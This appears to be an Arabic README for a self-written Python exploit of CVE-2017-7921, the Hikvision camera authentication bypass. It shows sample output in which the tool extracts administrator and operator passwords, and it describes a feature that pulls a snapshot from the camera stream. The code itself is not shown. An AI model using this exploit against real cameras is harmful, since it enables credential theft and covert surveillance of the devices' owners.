
إعادة كتابة بسيطة لـ CVE-2017-7921 بلغة بايثون بواسطتي. للأغراض التعليمية فقط!
إعادة كتابة بسيطة لـ CVE-2017-7921 بلغة بايثون بواسطتي. للأغراض التعليمية فقط!
بسيطة نوعًا ما، لم أضمن فحوصات لأشياء مثل عناوين IP، وفحوصات متقدمة للاستجابة وما شابه. اختبرتها على كاميرا مصرح لي باختبارها (ضمن شبكتي المحلية) وبدا أنها تعمل بشكل مثالي.
#مثال على الإخراج:
python 2017.py
found usernames: admin,defualt
admin:Pa$$W0rd
defualt:Xf07732479
تتطابق بيانات الاعتماد هذه مع ما سنحصل عليه إذا استخدمنا نفس الاستغلال على "msfconsole"
[*] User Credentials Information:
-----------------------------
User:admin | ID:1 | Role:Administrator | Password: Pa$$W0rd
User:defualt | ID:2 | Role:Operator | Password: Xf07732479
#المصادر التفاصيل الفعلية: https://medium.com/@k3yb0ard/when-you-pay-to-sell-your-own-privacy-a-technical-deep-dive-into-cve-2017-7921-hikvision-auth-576b581f4afe
cve: https://nvd.nist.gov/vuln/detail/cve-2017-7921
#تحديث
أضفت أيضًا snapshot التي تتيح لك الحصول على لقطة من /Streaming/channels/1/picture وحفظها في ملف ip.jpg